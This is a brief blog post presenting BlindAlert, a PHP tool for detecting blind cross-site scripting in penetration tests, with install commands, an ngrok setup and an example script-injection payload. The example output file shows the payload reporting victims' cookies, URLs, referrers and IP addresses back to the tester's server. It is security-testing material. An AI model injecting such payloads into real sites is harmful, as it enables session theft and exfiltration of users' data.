BlindAlert — Blind Cross Site Script tool
Feb 11, 2018 · 1 min read

Blind Cross Site Script requires more effort to find out in any application while pentesting. It requires server, where you need to host a tool which is capable of finding out Blind-XSS.
BlindAlert is an easy Blind Cross Site Scripting tool which you can run locally or you can host in server.
Requirements
- PHP >= 5.7
- Running server or ngrok (access localhost over the internet)
Installation
Either you can install in your local system and access through the ngrok or install into a live server.
To install BlindAlert, simply clone the repo
git clone https://github.com/mdhama/blindAlert.gitTo Run on local server
cd blindAlert
php -S localhost:80Now open http://localhost in your browser.
Over the internet using ngrok
./ngrok http 80Uses
- Create a JS payload and start blindly putting into endpoints :-)
e.g. "><script src="http://localhost"></script> - When it executes sucessfully, it creates an output file within the same project directory.
Example output file.txt:
origin: http://example
host: example
url: http://example/user/posts
referrer: http://example/user
user-agent: <user-agent>
cookies: <document.cookie>
ip: <ip_addess>